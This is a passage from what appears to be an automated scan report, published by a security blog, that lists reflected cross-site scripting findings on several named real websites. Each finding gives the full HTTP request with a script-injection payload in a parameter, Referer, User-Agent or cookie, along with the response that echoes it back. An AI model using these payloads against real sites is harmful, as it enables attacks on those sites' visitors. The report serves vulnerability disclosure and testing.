The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 4100a--><script>alert(1)</script>1dd4930cfbd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /?4100a--><script>alert(1)</script>1dd4930cfbd=1 HTTP/1.1
Host: www.wi-fihotspotlist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 14:57:28 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 14:58:28 GMT
Connection: close
Content-Type: text/html
Content-Length: 59068

<html>
<head>
<title> Wi-FiHotSpotList.com, a directory of public hot spots for finding Wi-Fi
wireless Internet access network nodes</title>
<meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
<!-- house_ribbon: Missing QUAD ads for page_type: other on path www.wi-fihotspotlist.com with position U
url: /?4100a--><script>alert(1)</script>1dd4930cfbd=1 -->
...[SNIP]...

3.134. http://www.internet.com/sections/asp.html [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.internet.com
Path:   /sections/asp.html

Issue detail

The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload 26527<a>f1ef85c6ffb was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /sections/asp.html HTTP/1.1
Host: www.internet.com
Accept: */*
Accept-Language: en
User-Agent: 26527<a>f1ef85c6ffb
Connection: close
Cookie: WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026071106:ss=1298026071106; RMAM=01TFSM_1700.4fWHbZaG|; PHPSESSID=368403e253d2cea987fe9303f109d57f; OAX=rcHW801a81gABvEW;

Response (redirected)

HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Set-Cookie: CFID=72030; Domain=.internet.com; Expires=Sun, 16-Feb-2020 14:58:01 GMT; Path=/
Set-Cookie: CFTOKEN=AD9023F2-BD82-43AC-9CEDECC5C51C7067; Domain=.internet.com; Expires=Sun, 16-Feb-2020 14:58:01 GMT; Path=/
Content-Type: text/html;charset=utf-8
Date: Fri, 18 Feb 2011 14:58:01 GMT
Connection: close


                                                                                                                                                                                                                                                                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML
...[SNIP]...
<td class="debug" nowrap>26527<a>f1ef85c6ffb</td>
...[SNIP]...

3.135. http://www.internet.com/sections/win.html [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.internet.com
Path:   /sections/win.html

Issue detail

The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload d27ea<a>18498db0b9f was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /sections/win.html HTTP/1.1
Host: www.internet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)d27ea<a>18498db0b9f
Connection: close
Cookie: WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026071106:ss=1298026071106; RMAM=01TFSM_1700.4fWHbZaG|; PHPSESSID=368403e253d2cea987fe9303f109d57f; OAX=rcHW801a81gABvEW;

Response (redirected)

HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Set-Cookie: CFID=71987; Domain=.internet.com; Expires=Sun, 16-Feb-2020 14:58:01 GMT; Path=/
Set-Cookie: CFTOKEN=35D983F5-72F6-4867-BD6FB322826071B9; Domain=.internet.com; Expires=Sun, 16-Feb-2020 14:58:01 GMT; Path=/
Content-Type: text/html;charset=utf-8
Date: Fri, 18 Feb 2011 14:58:00 GMT
Connection: close


                                                                                                                                                                                                                                                                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML
...[SNIP]...
<td class="debug" nowrap>Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)d27ea<a>18498db0b9f</td>
...[SNIP]...

3.136. http://www.liverpoolonlinedegrees.co.uk/2x/prequal.jsp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.liverpoolonlinedegrees.co.uk
Path:   /2x/prequal.jsp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d242"><script>alert(1)</script>c13b4e9f625 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /2x/prequal.jsp HTTP/1.1
Host: www.liverpoolonlinedegrees.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=4d242"><script>alert(1)</script>c13b4e9f625

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By:
P3P: CP="ALL DSP COR CURa ADMa DEVa PSAa OUR BUS PHY ONL UNI COM NAV DEM STA PRE"
Cache-Control: public
Content-Type: text/html;charset=ISO-8859-1
Date: Fri, 18 Feb 2011 15:01:06 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=KxHn6svRMsE8juKRCV91xw**.app2-all1; Path=/
Set-Cookie: CLK=0#1298041266572; Expires=Sat, 16-Feb-2019 15:01:06 GMT; Path=/
Set-Cookie: CLK=0#1298041266572; Expires=Sat, 16-Feb-2019 15:01:06 GMT; Path=/
Content-Length: 33038

<!-- Copyright Quinstreet Inc., 2011 -->
<html>
<head>
<title> University of Liverpool</title>
<link rel="stylesheet" href="Style.css" type="text/css"/>
<script language="JavaScript" type="text/javasc
...[SNIP]...
<Input Name="A127" Value="http://www.google.com/search?hl=en&q=4d242"><script>alert(1)</script>c13b4e9f625" Type="hidden" tabIndex="15"/>
...[SNIP]...

3.137. http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /outsourcing-dot-net-development-contact-us.html

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 40f17<script>alert(1)</script>9d9bbfcf6ce was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /outsourcing-dot-net-development-contact-us.html HTTP/1.1
Host: www.outsourcingdotnetdevelopment.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=40f17<script>alert(1)</script>9d9bbfcf6ce
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=hf79nisglos82m29flubv3rp81

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 15:23:30 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 10232

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="IT Solut
...[SNIP]...
</script>9d9bbfcf6ce">40f17<script>alert(1)</script>9d9bbfcf6ce</a>
...[SNIP]...

3.138. http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /outsourcing-dot-net-development-contact-us.html

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56c7c"><script>alert(1)</script>214ec983f81 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /outsourcing-dot-net-development-contact-us.html HTTP/1.1
Host: www.outsourcingdotnetdevelopment.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=56c7c"><script>alert(1)</script>214ec983f81
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=hf79nisglos82m29flubv3rp81

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 15:23:30 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 9874

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="IT Solut
...[SNIP]...
<a href="http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html" title="56c7c"><script>alert(1)</script>214ec983f81">
...[SNIP]...

3.139. http://www.outsourcingdotnetdevelopment.com/xss-cross-site-scripting.html [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /xss-cross-site-scripting.html

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d762"><script>alert(1)</script>580c35d613d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /xss-cross-site-scripting.html HTTP/1.1
Host: www.outsourcingdotnetdevelopment.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=1d762"><script>alert(1)</script>580c35d613d

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 14:58:15 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=hvqru3oc84p0t9uhs35uhe1f47; path=/
Connection: close
Content-Type: text/html
Content-Length: 18687

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="xss (cro
...[SNIP]...
<a href="http://www.outsourcingdotnetdevelopment.com/xss-cross-site-scripting.html" title="1d762"><script>alert(1)</script>580c35d613d">
...[SNIP]...

3.140. http://www.outsourcingdotnetdevelopment.com/xss-cross-site-scripting.html [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /xss-cross-site-scripting.html

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload b5b73<script>alert(1)</script>09d8451dc31 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /xss-cross-site-scripting.html HTTP/1.1
Host: www.outsourcingdotnetdevelopment.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=b5b73<script>alert(1)</script>09d8451dc31

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 14:58:16 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=lvcmsh7stqdse1kgcaeika84r2; path=/
Connection: close
Content-Type: text/html
Content-Length: 19009

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="xss (cro
...[SNIP]...
</script>09d8451dc31">b5b73<script>alert(1)</script>09d8451dc31</a>
...[SNIP]...

3.141. http://image.providesupport.com/js/virtacore/safe-monitor.js [vsid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image.providesupport.com
Path:   /js/virtacore/safe-monitor.js

Issue detail

The value of the vsid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 70132"-alert(1)-"47d14743a97 was submitted in the vsid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/virtacore/safe-monitor.js?ps_h=581W&ps_t=1297999466909 HTTP/1.1
Host: image.providesupport.com
Proxy-Connection: keep-alive
Referer: http://www.powervps.com/cpanel-plesk-vps.aspx
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vsid=EnEadSGx2lPF70132"-alert(1)-"47d14743a97

Response

HTTP/1.1 200 OK
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NOI CURa ADMa DEVa OUR IND COM NAV", policyref="/w3c/p3p.xml"
Content-Type: application/x-javascript
Cache-Control: must-revalidate, max-age=0
Pragma: no-cache
Content-Length: 2869
Date: Fri, 18 Feb 2011 03:24:02 GMT
Connection: close

var ps581Wsid = "EnEadSGx2lPF70132"-alert(1)-"47d14743a97";
// safe-monitor@gecko.js

var ps581Wiso;
try {
   ps581Wiso = (opener != null) && (typeof(opener.name) != "unknown") && (opener.ps581Wwid != null);
} catch(e) {
   ps581Wiso = false;
}
if (ps581Wiso) {
...[SNIP]...

3.142. http://www.internet.com/ebook [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.internet.com
Path:   /ebook

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b998f</script><script>alert(1)</script>ad4b92d09c2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ebook?b998f</script><script>alert(1)</script>ad4b92d09c2=1 HTTP/1.1
Host: www.internet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026071106:ss=1298026071106; RMAM=01TFSM_1700.4fWHbZaG|; PHPSESSID=368403e253d2cea987fe9303f109d57f; OAX=rcHW801a81gABvEW;

Response

HTTP/1.1 301 http://www.devx.com/ebook?b998f</script><script>alert(1)</script>ad4b92d09c2=1
Server: Apache-Coyote/1.1
Location: http://www.devx.com/ebook?b998f</script><script>alert(1)</script>ad4b92d09c2=1
Set-Cookie: CFID=37152; Domain=.internet.com; Expires=Sun, 16-Feb-2020 14:58:00 GMT; Path=/
Set-Cookie: CFTOKEN=49539B8F-F781-4E62-90E20742BCEE58F5; Domain=.internet.com; Expires=Sun, 16-Feb-2020 14:58:00 GMT; Path=/
Set-Cookie: ORIGREFERER=; Path=/
Content-Type: text/html;charset=utf-8
Date: Fri, 18 Feb 2011 14:58:00 GMT
Connection: close


<html>
<head>
<meta http-equiv="Refresh" content="0,http://www.devx.com/ebook?b998f</script><script>alert(1)</script>ad4b92d09c2=1">
</head>
<body>
<script language="javascript">
window.location.replace("http://www.devx.com/ebook?b998f</script><script>alert(1)</script>ad4b92d09c2=1");
</script>
...[SNIP]...

3.143. http://www.internet.com/ebook [name of an arbitrarily supplied request parameter]  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.internet.com
Path:   /ebook

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60338"><script>alert(1)</script>86ce1a3ea2b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ebook?60338"><script>alert(1)</script>86ce1a3ea2b=1 HTTP/1.1
Host: www.internet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026071106:ss=1298026071106; RMAM=01TFSM_1700.4fWHbZaG|; PHPSESSID=368403e253d2cea987fe9303f109d57f; OAX=rcHW801a81gABvEW;

Response

HTTP/1.1 301 http://www.devx.com/ebook?60338"><script>alert(1)</script>86ce1a3ea2b=1
Server: Apache-Coyote/1.1
Location: http://www.devx.com/ebook?60338"><script>alert(1)</script>86ce1a3ea2b=1
Set-Cookie: CFID=37054; Domain=.internet.com; Expires=Sun, 16-Feb-2020 14:57:59 GMT; Path=/
Set-Cookie: CFTOKEN=F0F2D3FB-0748-4491-87EF945DB496BB52; Domain=.internet.com; Expires=Sun, 16-Feb-2020 14:57:59 GMT; Path=/
Set-Cookie: ORIGREFERER=; Path=/
Content-Type: text/html;charset=utf-8
Date: Fri, 18 Feb 2011 14:57:59 GMT
Connection: close


<html>
<head>
<meta http-equiv="Refresh" content="0,http://www.devx.com/ebook?60338"><script>alert(1)</script>86ce1a3ea2b=1">
</head>
<body>
<script language="javascript">
window.location.replace(
...[SNIP]...

Report generated by XSS.CX Research Blog at Tue Mar 01 08:34:14 CST 2011.